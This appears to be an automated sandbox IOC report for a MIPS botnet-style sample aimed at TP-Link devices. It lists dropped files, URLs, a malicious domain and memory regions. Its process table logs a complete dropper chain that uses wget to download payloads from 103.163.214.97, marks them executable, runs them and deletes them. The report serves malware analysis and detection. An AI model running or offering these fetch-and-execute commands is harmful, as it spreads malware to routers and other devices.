IOC Report


Files

File Path | Type | Category | Malicious
/tmp/lib | ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped | dropped | malicious
/tmp/shk | ASCII text | dropped |

Processes

Path | Cmdline | Malicious
/bin/sh | /bin/sh -c "cd /tmp; rm -rf shk; wget http://103.163.214.97/shk; chmod 777 shk; ./shk tplink; rm -rf shk" |
/bin/sh | - |
/usr/bin/rm | rm -rf shk |
/bin/sh | - |
/usr/bin/wget | wget http://103.163.214.97/shk |
/bin/sh | - |
/usr/bin/chmod | chmod 777 shk |
/bin/sh | - |
/bin/sh | /bin/sh ./shk tplink |
/bin/sh | - |
/usr/bin/rm | rm -rf lib |
/bin/sh | - |
/usr/bin/rm | rm -rf mips |
/bin/sh | - |
/usr/bin/wget | wget http://103.163.214.97/mips -O lib |
/bin/sh | - |
/usr/bin/chmod | chmod 777 lib |
/bin/sh | - |
/tmp/lib | ./lib tplink |
/tmp/lib | - |
/tmp/lib | - |
/bin/sh | - |
/usr/bin/rm | rm -rf lib |
/bin/sh | - |
/usr/bin/rm | rm -rf shk |

URLs

Name | IP | Malicious
http://103.163.214.97/mips | 103.163.214.97 |
http://103.163.214.97/shk | 103.163.214.97 |

Domains

Name | IP | Malicious
rootme.xyz | 45.128.232.208 | malicious

IPs

IP | Domain | Country | Malicious

Memdumps

Base Address | Regiontype | Protect | Malicious
7f20f841d000 | | page execute read | malicious
7f20f842f000 | | page read and write |
7f2180a52000 | | page read and write |
7ffeeadce000 | | page read and write |
7f2180d83000 | | page read and write |
7f2180a12000 | | page read and write |
7f21803c1000 | | page read and write |
7f217fbab000 | | page read and write |
559777162000 | | page read and write |
7f2181095000 | | page read and write |
7f2180671000 | | page read and write |
559777294000 | | page read and write |
55977714b000 | | page execute and read and write |
55977514d000 | | page read and write |
7f218108d000 | | page read and write |
7f2180a35000 | | page read and write |
7ffeeadd2000 | | page execute read |
7f20f842e000 | | page read and write |
7f2180f64000 | | page read and write |
559775143000 | | page read and write |
7f2178000000 | | page read and write |
559774ebb000 | | page execute read |
7f21810da000 | | page read and write |
7f2178021000 | | page read and write |
7f21803b3000 | | page read and write |